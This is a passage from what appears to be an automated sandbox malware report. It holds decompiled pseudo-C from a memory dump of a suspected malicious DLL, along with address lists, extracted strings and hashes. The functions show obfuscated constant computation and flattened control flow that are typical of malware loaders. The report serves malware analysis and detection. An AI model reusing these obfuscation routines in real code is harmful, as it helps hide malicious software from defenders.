						}
						_t389 =  *0xd56220; // 0x0
						_t403 = _v20;
						_t390 = E00D48B9E(_t403, _v152, _v136, _v60,  *((intOrPtr*)(_t389 + 0x28)),  *((intOrPtr*)(_t389 + 0x24)), _v92);
						_t448 =  &(_t448[5]);
						if(_t390 != _v120) {
							_t444 = 0x7737a40;
						} else {
							_t444 = 0x9042860;
							_t391 = 1;
						}
						goto L1;
						L12:
						__eflags = _t444 - 0xe3acfc2;
					} while (__eflags != 0);
					goto L16;
				}
			}

0x00d42142
0x00d42148
0x00d42155
0x00d42160
0x00d4216f
0x00d42171
0x00d42176
0x00d4217d
0x00d42185
0x00d42193
0x00d42196
0x00d42198
0x00d4219e
0x00d421a6
0x00d421ae
0x00d421bb
0x00d421be
0x00d421c2
0x00d421ca
0x00d421d2
0x00d421df
0x00d421e3
0x00d421e8
0x00d421ed
0x00d421f5
0x00d42202
0x00d42206
0x00d4220e
0x00d42213
0x00d4221b
0x00d42223
0x00d42233
0x00d42237
0x00d4223f
0x00d42247
0x00d4224f
0x00d42257
0x00d4225c
0x00d42264
0x00d4226f
0x00d4227a
0x00d42285
0x00d4228d
0x00d42292
0x00d4229a
0x00d422a5
0x00d422b0
0x00d422bb
0x00d422c7
0x00d422cc
0x00d422d2
0x00d422d7
0x00d422df
0x00d422ea
0x00d422f2
0x00d422fd
0x00d42305
0x00d42311
0x00d42314
0x00d42318
0x00d42320
0x00d4232a
0x00d42338
0x00d4233d
0x00d42343
0x00d4234b
0x00d42353
0x00d4235d
0x00d42360
0x00d42364
0x00d4236c
0x00d42374
0x00d4237c
0x00d42384
0x00d4238c
0x00d42397
0x00d4239f
0x00d423aa
0x00d423b5
0x00d423c0
0x00d423cb
0x00d423d3
0x00d423db
0x00d423e0
0x00d423e8
0x00d423f0
0x00d423f8
0x00d42400
0x00d42408
0x00d42410
0x00d42414
0x00d4241c
0x00d42429
0x00d4242d
0x00d4243a
0x00d4243e
0x00d42446
0x00d4244e
0x00d4245a
0x00d4245d
0x00d42461
0x00d42469
0x00d42471
0x00d42479
0x00d42481
0x00d42489
0x00d42499
0x00d424a1
0x00d424a9
0x00d424b1
0x00d424b6
0x00d424be
0x00d424c3
0x00d424cb
0x00d424d8
0x00d424dc
0x00d424e4
0x00d424ec
0x00d424f6
0x00d424fa
0x00d42502
0x00d4250a
0x00d4251f
0x00d42524
0x00d4252a
0x00d4252f
0x00d42537
0x00d42543
0x00d42548
0x00d4254e
0x00d42556
0x00d4255e
0x00d42563
0x00d42568
0x00d42570
0x00d42578
0x00d42580
0x00d42589
0x00d4258e
0x00d42594
0x00d4259c
0x00d425a4
0x00d425b1
0x00d425b2
0x00d425bc
0x00d425c0
0x00d425c8
0x00d425d3
0x00d425de
0x00d425e9
0x00d425f4
0x00d425fc
0x00d42607
0x00d42612
0x00d4261d
0x00d42628
0x00d42628
0x00d42628
0x00d4262d
0x00d4262d
0x00d42633
0x00d42710
0x00d42719
0x00d42720
0x00d42731
0x00d4275d
0x00d4276b
0x00d4276d
0x00d42778
0x00d4277d
0x00d42780
0x00000000
0x00d42780
0x00d4263f
0x00d426b4
0x00d426b5
0x00d426b8
0x00d426bd
0x00d426c5
0x00d426df
0x00d426e7
0x00d426ec
0x00d426f2
0x00d426f5
0x00d426fd
0x00d426ff
0x00d42702
0x00d42705
0x00d42708
0x00d42628
0x00d42628
0x00d42628
0x00000000
0x00d42628
0x00d42628
0x00d42643
0x00d427b7
0x00d427c4
0x00d427d7
0x00d427e4
0x00d427ef
0x00d427f8
0x00d427f8
0x00d4264f
0x00d427a6
0x00000000
0x00d427ac
0x00d42657
0x00000000
0x00000000
0x00d42661
0x00d4267b
0x00d42682
0x00d42687
0x00d4268e
0x00d4269a
0x00d42690
0x00d42692
0x00d42697
0x00d42697
0x00000000
0x00d42785
0x00d42785
0x00d42785
0x00000000
0x00d42791

Strings

)^^, xrefs: 00D4221B
:*, xrefs: 00D423D3
b, xrefs: 00D423AA
J;, xrefs: 00D422DF
f, xrefs: 00D42160

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )^^$:*$J;$b$f
API String ID: 0-204930537
Opcode ID: 7586446c25d515a37242616d025c1812651200a60cb1bc55b6da1fef037ed5d0
Instruction ID: 75b9693776741593433a5f435e1a3d23dd2823cef950e247bc5d61b958b5083b
Opcode Fuzzy Hash: 7586446c25d515a37242616d025c1812651200a60cb1bc55b6da1fef037ed5d0
Instruction Fuzzy Hash: 33F12FB16083809FC368CF25D58AA0BFBF1FBC4718F50891DF5998A261DBB59949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00D52009, Relevance: 6.5, Strings: 5, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00D52009() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				unsigned int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				unsigned int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t319;
				void* _t320;
				intOrPtr _t321;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t333;
				intOrPtr _t340;
				void* _t364;
				signed int* _t368;

				_t368 =  &_v1184;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0x35c0cd;
				_v1048 = 0xa3be33;
				_v1136 = 0x5ade05;
				_v1136 = _v1136 + 0xffffc499;
				_v1136 = _v1136 >> 0xf;
				_v1136 = _v1136 ^ 0x000b842c;
				_v1180 = 0x412a9d;
				_t326 = 0x29;
				_v1180 = _v1180 / _t326;
				_v1180 = _v1180 << 0xb;
				_t364 = 0xe958b9c;
				_v1180 = _v1180 + 0xffff9519;
				_v1180 = _v1180 ^ 0x0cbc23a5;
				_v1156 = 0xd33cfc;
				_v1156 = _v1156 + 0xffff4a87;
				_v1156 = _v1156 ^ 0xbe5aeb75;
				_t327 = 0xb;
				_v1156 = _v1156 * 0x62;
				_v1156 = _v1156 ^ 0xf0302705;
				_v1148 = 0xf18826;
				_v1148 = _v1148 << 1;
				_v1148 = _v1148 >> 0xa;
				_v1148 = _v1148 + 0xffff44eb;
				_v1148 = _v1148 ^ 0xfffe3e21;
				_v1112 = 0x4e0c4f;
				_v1112 = _v1112 + 0x7be6;
				_v1112 = _v1112 ^ 0x004f5571;
				_v1128 = 0xa7ca39;
				_v1128 = _v1128 + 0xffffebca;
				_v1128 = _v1128 / _t327;
				_v1128 = _v1128 ^ 0x000be641;
				_v1176 = 0xb5e613;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 << 0xb;
				_v1176 = _v1176 >> 3;
				_v1176 = _v1176 ^ 0x109d8d71;
				_v1100 = 0x8f570;
				_v1100 = _v1100 << 6;
				_v1100 = _v1100 ^ 0x02300751;
				_v1184 = 0x7a4582;
				_v1184 = _v1184 >> 0xc;
				_v1184 = _v1184 + 0xffff757f;
				_v1184 = _v1184 + 0xcda4;
				_v1184 = _v1184 ^ 0x0000a546;
				_v1140 = 0x8d05f4;
				_v1140 = _v1140 * 3;
				_v1140 = _v1140 | 0x54c49d95;
				_v1140 = _v1140 + 0xffffe0ec;
				_v1140 = _v1140 ^ 0x55e75198;
				_v1108 = 0xd76cc6;
				_v1108 = _v1108 | 0x05cc2328;
				_v1108 = _v1108 ^ 0x05dcca41;
				_v1076 = 0x1bbfa4;
				_v1076 = _v1076 * 0x15;
				_v1076 = _v1076 ^ 0x02435ecc;
				_v1084 = 0x2803a8;
				_v1084 = _v1084 << 0xd;
				_v1084 = _v1084 ^ 0x007964fc;
				_v1092 = 0x1abb48;
				_v1092 = _v1092 ^ 0xd0321100;
				_v1092 = _v1092 ^ 0xd024152f;
				_v1120 = 0x1b785b;
				_v1120 = _v1120 + 0x6594;
				_v1120 = _v1120 ^ 0xc9bc1812;
				_v1120 = _v1120 ^ 0xc9a1a482;
				_v1056 = 0xf96b0d;
				_v1056 = _v1056 | 0x7a81934f;
				_v1056 = _v1056 ^ 0x7af06d17;
				_v1116 = 0xc0176d;
				_t328 = 0x57;
				_v1116 = _v1116 / _t328;
				_v1116 = _v1116 ^ 0x000c7a92;
				_v1144 = 0x386a20;
				_v1144 = _v1144 >> 0xa;
				_t329 = 0x41;
				_v1144 = _v1144 * 0x35;
				_v1144 = _v1144 + 0xffff2f3c;
				_v1144 = _v1144 ^ 0x00015cc7;
				_v1124 = 0xfe7131;
				_v1124 = _v1124 >> 4;
				_v1124 = _v1124 + 0xffffd592;
				_v1124 = _v1124 ^ 0x000ea5e3;
				_v1172 = 0xf233ef;
				_v1172 = _v1172 / _t329;
				_v1172 = _v1172 >> 8;
				_v1172 = _v1172 >> 7;
				_v1172 = _v1172 ^ 0x000dfea7;
				_v1088 = 0xf13b31;
				_v1088 = _v1088 << 4;
				_v1088 = _v1088 ^ 0x0f1b90b2;
				_v1060 = 0x8432f0;
				_v1060 = _v1060 + 0xf898;
				_v1060 = _v1060 ^ 0x00806ced;
				_v1096 = 0x8a20ae;
				_v1096 = _v1096 + 0xffff5c91;
				_v1096 = _v1096 ^ 0x008c8276;
				_v1072 = 0xbc3343;
				_v1072 = _v1072 | 0xeb032685;
				_v1072 = _v1072 ^ 0xebbb8611;
				_v1104 = 0xb5445c;
				_v1104 = _v1104 | 0x38284c17;
				_v1104 = _v1104 ^ 0x38b8f1ba;
				_v1152 = 0x20ddec;
				_t330 = 0x69;
				_v1152 = _v1152 * 0x4d;
				_v1152 = _v1152 >> 1;
				_v1152 = _v1152 << 0xc;
				_v1152 = _v1152 ^ 0x15fd1151;
				_v1132 = 0xda9d4d;
				_v1132 = _v1132 / _t330;
				_v1132 = _v1132 ^ 0x63ba58ef;
				_v1132 = _v1132 ^ 0x63ba5da3;
				_v1080 = 0xcf1222;
				_v1080 = _v1080 | 0x484758e4;
				_v1080 = _v1080 ^ 0x48c184f1;
				_v1064 = 0x309461;
				_v1064 = _v1064 + 0xffffd409;
				_v1064 = _v1064 ^ 0x00392de5;
				_v1164 = 0xd882bd;
				_t331 = 0xc;
				_v1164 = _v1164 / _t331;
				_v1164 = _v1164 + 0x74b;
				_v1164 = _v1164 >> 3;
				_v1164 = _v1164 ^ 0x00039f5a;
				_v1160 = 0x7a48e2;
				_v1160 = _v1160 ^ 0x69cb0a8d;
				_v1160 = _v1160 ^ 0x1624d419;
				_v1160 = _v1160 >> 9;
				_v1160 = _v1160 ^ 0x00301506;
				_v1168 = 0x1f51cb;
				_v1168 = _v1168 ^ 0x7c6813be;
				_v1168 = _v1168 * 0x65;
				_v1168 = _v1168 + 0xffff91bf;
				_v1168 = _v1168 ^ 0x1b097545;
				_v1068 = 0x9ab8d;
				_v1068 = _v1068 + 0x88f0;
				_v1068 = _v1068 ^ 0x000186e4;
				E00D3556B(_t331);
				do {
					while(_t364 != 0x62623fc) {
						if(_t364 == 0x81770e6) {
							return E00D4654A(_v1160, _v1168, __eflags,  &_v520, _v1068,  &_v1040);
						}
						if(_t364 == 0xe065299) {
							_push(_v1124);
							_push(_v1144);
							_push(_v1116);
							_t319 = E00D4E1F8(0xd31080, _v1056, __eflags);
							_t320 = E00D3DC1B(_v1172);
							_t340 =  *0xd56214; // 0x0
							_t321 =  *0xd56214; // 0x0
							E00D544AD(_v1060, __eflags, _v1096,  &_v1040, _t321 + 0x23c, _v1072, _v1104, _t319, _t340 + 0x34, _t320, _v1152);
							_t315 = E00D4FECB(_t319, _v1132, _v1080, _v1064, _v1164);
							_t368 =  &(_t368[0xf]);
							_t364 = 0x81770e6;
							continue;
						}
						if(_t364 != 0xe958b9c) {
							goto L8;
						}
						_t364 = 0x62623fc;
					}
					_push(_v1128);
					_push(_v1112);
					_push(_v1148);
					_t310 = E00D4E1F8(0xd31000, _v1156, __eflags);
					_t333 =  *0xd56214; // 0x0
					_t312 =  *0xd56214; // 0x0
					__eflags = _t312 + 0x23c;
					E00D52D0A(_v1100, _t312 + 0x23c, _t312 + 0x23c, _v1184, _v1140, _v1108, _t333 + 0x34,  &_v520, _t333 + 0x34, _t310);
					_t315 = E00D4FECB(_t310, _v1076, _v1084, _v1092, _v1120);
					_t368 =  &(_t368[0xe]);
					_t364 = 0xe065299;
					L8:
					__eflags = _t364 - 0xc2e12c9;
				} while (__eflags != 0);
				return _t315;
			}

0x00d52009
0x00d5200f
0x00d52019
0x00d52024
0x00d5202f
0x00d52037
0x00d5203f
0x00d52044
0x00d5204c
0x00d5205e
0x00d52063
0x00d52069
0x00d5206e
0x00d52073
0x00d5207b
0x00d52083
0x00d5208b
0x00d52093
0x00d520a0
0x00d520a1
0x00d520a5
0x00d520ad
0x00d520b5
0x00d520b9
0x00d520be
0x00d520c6
0x00d520ce
0x00d520d6
0x00d520de
0x00d520e6
0x00d520ee
0x00d520fc
0x00d52100
0x00d52108
0x00d52110
0x00d52115
0x00d5211a
0x00d5211f
0x00d52127
0x00d5212f
0x00d52134
0x00d5213c
0x00d52144
0x00d52149
0x00d52151
0x00d52159
0x00d52161
0x00d5216e
0x00d52172
0x00d5217a
0x00d52182
0x00d5218a
0x00d52192
0x00d5219a
0x00d521a2
0x00d521af
0x00d521b3
0x00d521bb
0x00d521c3
0x00d521c8
0x00d521d0
0x00d521d8
0x00d521e0
0x00d521e8
0x00d521f0
0x00d521f8
0x00d52200
0x00d52208
0x00d52215
0x00d52220
0x00d5222b
0x00d52239
0x00d5223e
0x00d52244
0x00d5224c
0x00d52254
0x00d5225e
0x00d52261
0x00d52265
0x00d5226d
0x00d52275
0x00d5227d
0x00d52282
0x00d5228a
0x00d52292
0x00d522a2
0x00d522a6
0x00d522ab
0x00d522b0
0x00d522b8
0x00d522c0
0x00d522c5
0x00d522cd
0x00d522d8
0x00d522e3
0x00d522ee
0x00d522f6
0x00d522fe
0x00d52306
0x00d52311
0x00d5231c
0x00d52327
0x00d5232f
0x00d52337
0x00d5233f
0x00d5234c
0x00d5234f
0x00d52353
0x00d52357
0x00d5235c
0x00d52364
0x00d52374
0x00d52378
0x00d52380
0x00d52388
0x00d52390
0x00d52398
0x00d523a0
0x00d523ab
0x00d523b6
0x00d523c1
0x00d523cd
0x00d523d0
0x00d523d4
0x00d523dc
0x00d523e1
0x00d523e9
0x00d523f1
0x00d523f9
0x00d52401
0x00d52406
0x00d5240e
0x00d52416
0x00d52423
0x00d52427
0x00d5242f
0x00d52437
0x00d52442
0x00d5244d
0x00d52460
0x00d52474
0x00d52474
0x00d5247e
0x00000000
0x00d525e3
0x00d52486
0x00d52498
0x00d524a1
0x00d524a5
0x00d524b0
0x00d524bb
0x00d524c7
0x00d524de
0x00d52506
0x00d52523
0x00d52528
0x00d5252b
0x00000000
0x00d5252b
0x00d5248e
0x00000000
0x00000000
0x00d52494
0x00d52494
0x00d52532
0x00d5253b
0x00d5253f
0x00d52547
0x00d5254c
0x00d52571
0x00d5257d
0x00d52587
0x00d525a7
0x00d525ac
0x00d525af
0x00d525b1
0x00d525b1
0x00d525b1
0x00000000

Strings

Hz, xrefs: 00D523E9
XGH, xrefs: 00D52390
qUO, xrefs: 00D520DE
-9, xrefs: 00D523B6
j8, xrefs: 00D5224C

Memory Dump Source

Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true

Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: j8$qUO$-9$Hz$XGH
API String ID: 0-60989354
Opcode ID: 31809dea7421f2c6cde156d6ac30371e17d77f7c2e43d83c3f2fe210fa333028
Instruction ID: 9df645d7c9a2b3ba0395f6800f1a0e249b6e07b106b0952ffa7f39df92b34e1a
Opcode Fuzzy Hash: 31809dea7421f2c6cde156d6ac30371e17d77f7c2e43d83c3f2fe210fa333028
Instruction Fuzzy Hash: 20E132714097809FC3A8CF24C98AA5BBBF1FBC4748F508A1CF9D986260D7B48948CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D53EE9, Relevance: 6.5, Strings: 5, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00D53EE9() {
				intOrPtr _t261;
				intOrPtr _t262;
				void* _t268;
				signed char _t274;
				intOrPtr _t277;
				signed int _t288;
				intOrPtr _t289;
				signed char _t296;
				signed int _t316;
				intOrPtr _t326;
				intOrPtr _t330;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				intOrPtr _t342;
				void* _t344;

				 *(_t344 + 0x70) =  *(_t344 + 0x70) & 0x00000000;
				 *(_t344 + 0x74) =  *(_t344 + 0x74) & 0x00000000;
				_t288 = 0x4bd14f4;
				 *((intOrPtr*)(_t344 + 0x6c)) = 0x2dbabe;
				 *(_t344 + 0x4c) = 0x48601c;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) | 0x68876aab;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x68cba8bf;
				 *(_t344 + 8) = 0xdbf1f3;
				 *(_t344 + 0x18) =  *(_t344 + 8) * 9;
				_t333 = 0x4c;
				 *(_t344 + 0x1c) =  *(_t344 + 0x18) / _t333;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) << 0xd;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x4172a216;
				 *(_t344 + 0x3c) = 0x6d1b19;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) | 0x79048263;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) >> 5;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0x03cbeeb4;
				 *(_t344 + 0x18) = 0x1a2d0d;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) >> 6;
				_t334 = 9;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) / _t334;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) + 0xffff8a27;
				 *(_t344 + 0x18) =  *(_t344 + 0x18) ^ 0xfffbe0f3;
				 *(_t344 + 0x5c) = 0xa7cc6c;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) >> 4;
				 *(_t344 + 0x5c) =  *(_t344 + 0x5c) ^ 0x000a2772;
				 *(_t344 + 0x38) = 0x67bd1;
				_t335 = 0x3d;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) / _t335;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) << 0x10;
				 *(_t344 + 0x38) =  *(_t344 + 0x38) ^ 0x1b333388;
				 *(_t344 + 0x28) = 0xde9e16;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) | 0xff1d3c4c;
				_t336 = 6;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) / _t336;
				_t337 = 0x70;
				 *(_t344 + 0x24) =  *(_t344 + 0x28) / _t337;
				 *(_t344 + 0x24) =  *(_t344 + 0x24) ^ 0x006adbe6;
				 *(_t344 + 0x20) = 0xac092b;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xc14e4d03;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) + 0x9f69;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0x18e1fb77;
				 *(_t344 + 0x20) =  *(_t344 + 0x20) ^ 0xd908b9ac;
				 *(_t344 + 0x3c) = 0xd958f8;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xf9ce44cf;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) << 0xe;
				 *(_t344 + 0x3c) =  *(_t344 + 0x3c) ^ 0xc707f990;
				 *(_t344 + 0x1c) = 0x265505;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xffff5b39;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0x9a51;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) + 0xc9e0;
				 *(_t344 + 0x1c) =  *(_t344 + 0x1c) ^ 0x00291d5e;
				 *(_t344 + 0x4c) = 0xea08b8;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0xb1227b65;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) * 0x47;
				 *(_t344 + 0x4c) =  *(_t344 + 0x4c) ^ 0x4e906ac6;
				 *(_t344 + 0x60) = 0x906ac9;
				_t338 = 0x13;
				_t330 =  *((intOrPtr*)(_t344 + 0x78));
				_t342 =  *((intOrPtr*)(_t344 + 0x78));
				 *(_t344 + 0x60) =  *(_t344 + 0x60) * 3;
				 *(_t344 + 0x60) =  *(_t344 + 0x60) ^ 0x01b02f9b;
				 *(_t344 + 0x48) = 0xe018a0;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) >> 3;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) << 4;
				 *(_t344 + 0x48) =  *(_t344 + 0x48) ^ 0x01c3463d;
				 *(_t344 + 0x44) = 0xcf92eb;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) | 0xa78abf74;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) + 0x2871;
				 *(_t344 + 0x44) =  *(_t344 + 0x44) ^ 0xa7cf65bf;
				 *(_t344 + 0x40) = 0xa30b5e;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) / _t338;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b52837;
				 *(_t344 + 0x40) =  *(_t344 + 0x40) ^ 0xa5b9bcfc;
				 *(_t344 + 0x50) = 0x1f98d4;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x1ce7877d;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) >> 9;
				 *(_t344 + 0x50) =  *(_t344 + 0x50) ^ 0x000a2579;
				 *(_t344 + 0x64) = 0x5b61ba;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) + 0xffffd71d;
				 *(_t344 + 0x64) =  *(_t344 + 0x64) ^ 0x005007f5;
				 *(_t344 + 0x2c) = 0xb4bbf5;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x03029a47;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) >> 0xf;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b7d07c;
				 *(_t344 + 0x2c) =  *(_t344 + 0x2c) ^ 0x93b00a56;
				 *(_t344 + 0x28) = 0x1351a7;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) >> 9;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0xc8bf819f;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) * 0x2d;
				 *(_t344 + 0x28) =  *(_t344 + 0x28) ^ 0x49a4694e;
				 *(_t344 + 0x70) = 0x74ba7c;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3ad619e0;
				 *(_t344 + 0x70) =  *(_t344 + 0x70) ^ 0x3aa46fbb;
				 *(_t344 + 0x30) = 0x6db52d;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) << 9;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) + 0xffffb915;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) | 0x57796199;
				 *(_t344 + 0x30) =  *(_t344 + 0x30) ^ 0xdf7399d9;
				 *(_t344 + 0x54) = 0x4f3eba;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) + 0xffff5dec;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) << 7;
				 *(_t344 + 0x54) =  *(_t344 + 0x54) ^ 0x274d646c;
				while(1) {
					L1:
					_t316 =  *(_t344 + 0x68);
					while(1) {
						L2:
						_t261 =  *((intOrPtr*)(_t344 + 0x6c));
						L3:
						while(_t288 != 0x42bf5b6) {
							if(_t288 == 0x434f657) {
								_push( *(_t344 + 0x1c));
								_push( *(_t344 + 0x40));
								_push( *(_t344 + 0x28));
								 *((char*)(_t344 + 0x1f)) =  *((intOrPtr*)(_t330 + 1));
								 *(_t344 + 0x1e) =  *((intOrPtr*)(_t330 + 3));
								_t268 = E00D4E1F8(0xd31758,  *(_t344 + 0x30), __eflags);
								_push( *(_t330 + 2) & 0x000000ff);
								E00D3F96F( *(_t344 + 0x74), __eflags, 0x10,  *(_t344 + 0x3f) & 0x000000ff, _t268,  *(_t344 + 0x1e) & 0x000000ff,  *((intOrPtr*)(_t344 + 0x84)), _t342 + 0x20,  *(_t330 + 2) & 0x000000ff,  *(_t344 + 0x60),  *((intOrPtr*)(_t344 + 0x58)),  *(_t344 + 0x50));
								_t223 = _t344 + 0x5c; // 0xa2772
								E00D4FECB(_t268,  *((intOrPtr*)(_t344 + 0x90)),  *((intOrPtr*)(_t344 + 0xa0)),  *(_t344 + 0x64),  *_t223);
								_t344 = _t344 + 0x40;
								 *(_t342 + 0x14) = ( *(_t330 + 4) & 0x000000ff) << 0x00000008 |  *(_t330 + 5) & 0x000000ff;
								_t274 =  *((intOrPtr*)(_t330 + 6));
								_t296 =  *((intOrPtr*)(_t330 + 7));
								_t330 = _t330 + 8;
								_t288 = 0x42bf5b6;
								 *(_t342 + 0x44) = (_t274 & 0x000000ff) << 0x00000008 | _t296 & 0x000000ff;
								goto L1;
							} else {
								if(_t288 == 0x4bd14f4) {
									_t326 =  *0xd56228; // 0x0
									_t288 = 0x70ba79f;
									_t316 = _t326 + 0x14;
									 *(_t344 + 0x68) = _t316;
									goto L2;
								} else {
									if(_t288 == 0x70ba79f) {
										_t277 = E00D43D85( *(_t344 + 0x60), 0xd56000, __eflags, _t344 + 0x78,  *(_t344 + 0x18));
										_t316 =  *(_t344 + 0x70);
										_t330 = _t277;
										 *((intOrPtr*)(_t344 + 0x7c)) = _t277;
										_t261 = _t277 +  *((intOrPtr*)(_t344 + 0x78));
										 *((intOrPtr*)(_t344 + 0x6c)) = _t261;
										_t288 = 0xc4a3c33;
										continue;
									} else {
										if(_t288 == 0x9fd5b32) {
											__eflags = _t330 - _t261;
											asm("sbb ecx, ecx");
											_t288 = (_t288 & 0x0165beb9) + 0xae47d7a;
											continue;
										} else {
											if(_t288 == 0xae47d7a) {
												E00D52B09( *((intOrPtr*)(_t344 + 0x78)),  *((intOrPtr*)(_t344 + 0x7c)),  *((intOrPtr*)(_t344 + 0x34)),  *(_t344 + 0x54));
											} else {
												if(_t288 != 0xc4a3c33) {
													L17:
													__eflags = _t288 - 0xd28cf5a;
													if(__eflags != 0) {
														L2:
														_t261 =  *((intOrPtr*)(_t344 + 0x6c));
														continue;
													}
												} else {
													_push(_t288);
													_push(_t288);
													_t342 = E00D3C5D8(0x60);
													_t344 = _t344 + 0xc;
													if(_t342 != 0) {
														_t288 = 0x434f657;
														while(1) {
															L1:
															_t316 =  *(_t344 + 0x68);
															while(1) {
																L2:
																_t261 =  *((intOrPtr*)(_t344 + 0x6c));
																goto L3;
															}
														}
													}
												}
											}
										}
									}
								}
							}
							_t289 =  *0xd56228; // 0x0
							 *(_t289 + 0x1c) =  *(_t289 + 0x1c) & 0x00000000;
							 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 0x14));
							__eflags = 1;
							return 1;
						}
						_t262 =  *0xd56228; // 0x0
						_t288 = 0x9fd5b32;
						 *_t316 = _t342;
						_t316 = _t342 + 0x18;
						 *(_t344 + 0x68) = _t316;
						_t235 = _t262 + 0x18;
						 *_t235 =  *((intOrPtr*)(_t262 + 0x18)) + 1;
						__eflags =  *_t235;
						goto L17;
					}
				}
			}

0x00d53eec
0x00d53ef3
0x00d53ef8
0x00d53efd
0x00d53f05
0x00d53f0d
0x00d53f15
0x00d53f1d
0x00d53f2e
0x00d53f38
0x00d53f3d
0x00d53f43
0x00d53f48
0x00d53f50
0x00d53f58
0x00d53f60
0x00d53f65
0x00d53f6d
0x00d53f75
0x00d53f7e
0x00d53f83
0x00d53f89
0x00d53f91
0x00d53f99
0x00d53fa1
0x00d53fa6
0x00d53fae
0x00d53fba
0x00d53fbf
0x00d53fc5
0x00d53fca
0x00d53fd2
0x00d53fda
0x00d53fe6
0x00d53feb
0x00d53ff5
0x00d53ff8
0x00d53ffc
0x00d54004
0x00d5400c
0x00d54014
0x00d5401c
0x00d54024
0x00d5402c
0x00d54034
0x00d5403c
0x00d54041
0x00d54049
0x00d54051
0x00d54059
0x00d54061
0x00d54069
0x00d54071
0x00d54079
0x00d54086
0x00d5408a
0x00d54094
0x00d540a3
0x00d540a4
0x00d540a8
0x00d540ac
0x00d540b0
0x00d540b8
0x00d540c0
0x00d540c5
0x00d540ca
0x00d540d2
0x00d540da
0x00d540e2
0x00d540ea
0x00d540f2
0x00d54100
0x00d54104
0x00d5410c
0x00d54114
0x00d5411c
0x00d54124
0x00d54129
0x00d54131
0x00d54139
0x00d54141
0x00d54149
0x00d54151
0x00d54159
0x00d5415e
0x00d54166
0x00d5416e
